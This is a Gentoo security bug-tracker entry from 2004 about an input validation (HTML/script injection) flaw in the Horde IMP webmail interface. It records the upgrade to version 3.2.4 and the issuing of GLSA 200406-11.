Bug 53862

Summary:	net-www/horde-imp Input Validation Vulnerability
Product:	Gentoo Security	Reporter:	Lance Albertson (RETIRED) <ramereth>
Component:	Vulnerabilities	Assignee:	Gentoo Security <security>
Status:	RESOLVED FIXED
Severity:	minor
Priority:	High
Version:	unspecified
Hardware:	All
OS:	All
Whiteboard:	B3 [glsa]
Package list:		Runtime testing required:	---

Description Lance Albertson (RETIRED) gentoo-dev

2004-06-13 23:37:43 UTC

Excerpt from my SANS email:

04.23.34 CVE: Not Available
Platform: Web Application
Title: Horde IMP Input Validation Vulnerability
Description: Horde IMP is a web-based IMAP email interface written in
PHP. Insufficient sanitization of email messages that contain
malicious HTML or script code expose an arbitrary HTML injection and
script execution issue. All current releases in the 3.x branch are
affected.
Ref: http://www.horde.org/imp/3.2/

I don't see anything specific on their site about what exactly causes this (might be in the Changlog when you download it). Version 3.2.4 is in portage, but marked ~arch on all arch's. Bug #53400 was the initial bug for getting it into portage, but no mention of the security fix.

Comment 1 SpanKY gentoo-dev

2004-06-14 04:58:54 UTC

moved 3.2.4 to stable and removed 3.2.3

Comment 2 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev

2004-06-15 11:43:04 UTC

GLSA drafted. Security please review.

Bugtraq announcement can be found here:

http://www.securityfocus.com/bid/10501/

Note: bug number 53862 does not appear in the ChangeLog

Comment 3 Kurt Lieber (RETIRED) gentoo-dev

2004-06-16 06:31:27 UTC

glsa 200406-11